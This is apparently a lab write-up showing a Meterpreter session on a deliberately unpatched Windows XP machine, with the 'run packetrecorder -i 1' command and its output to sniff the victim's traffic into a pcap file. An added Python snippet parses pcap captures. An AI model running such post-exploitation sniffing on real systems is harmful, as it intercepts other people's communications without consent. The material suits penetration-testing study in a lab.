This follows on from a previous post in which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/LAB_20130625.5807/LAB_20130625.5807.cap
[*] Packet capture interval is 30 Seconds
^C <– Control +C to stop the process
[*] Interrupt
[+] Stopping Packet sniffer…
meterpreter >
The capture file is saved under .msf4, a hidden folder in root's home directory (/root) on Kali.
Rather conveniently, everything logged by packetrecorder is saved in the pcap file format, which is perfect for Wireshark. In the capture, 192.168.1.79 is the IP of the target machine.
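To show what the pcap format mentioned above contains, here is an added example (not part of the original post or of Metasploit) that parses a capture without Wireshark and lists the hosts that talked to 192.168.1.79. It assumes the classic pcap layout (24-byte global header, 16-byte record headers) with Ethernet link type; the sample capture and the peer addresses 192.168.1.10 and 192.168.1.1 are constructed.

```python
import socket
import struct
from collections import Counter

def build_sample_pcap():
    """Constructed sample capture: three Ethernet/IPv4 frames, little-endian pcap."""
    def frame(src, dst, proto):
        eth = b"\x00" * 12 + b"\x08\x00"  # zeroed MACs, EtherType IPv4
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, 64, proto, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
        return eth + ip
    frames = [frame("192.168.1.79", "192.168.1.10", 6),   # TCP
              frame("192.168.1.10", "192.168.1.79", 6),
              frame("192.168.1.79", "192.168.1.1", 17)]   # UDP
    # Global header: magic, version 2.4, thiszone, sigfigs, snaplen, linktype 1
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out

def summarize_pcap(data):
    """Count IPv4 packets per (src, dst, protocol) in a classic pcap byte string."""
    # The magic number's byte order tells us how the rest of the file is encoded
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(data[:4])
    if endian is None or len(data) < 24:
        raise ValueError("not a classic (microsecond) pcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    if linktype != 1:
        raise ValueError("only Ethernet captures (linktype 1) are handled")
    flows, off = Counter(), 24
    while off + 16 <= len(data):
        # Record header: ts_sec, ts_usec, incl_len, orig_len
        incl_len = struct.unpack(endian + "I", data[off + 8:off + 12])[0]
        pkt = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(pkt) < incl_len:
            break  # truncated final record
        # Ethernet header is 14 bytes; require EtherType IPv4 and a full IP header
        if len(pkt) >= 34 and pkt[12:14] == b"\x08\x00" and pkt[14] >> 4 == 4:
            src, dst = socket.inet_ntoa(pkt[26:30]), socket.inet_ntoa(pkt[30:34])
            flows[(src, dst, pkt[23])] += 1
    return flows

def peers_of(flows, host):
    """Hosts that exchanged packets with `host`."""
    return sorted({d if s == host else s for s, d, _ in flows if host in (s, d)})

if __name__ == "__main__":
    flows = summarize_pcap(build_sample_pcap())
    print(flows, peers_of(flows, "192.168.1.79"))
```

To run it on a real capture, pass the file's bytes (`open(path, "rb").read()`) to `summarize_pcap` instead of the constructed sample.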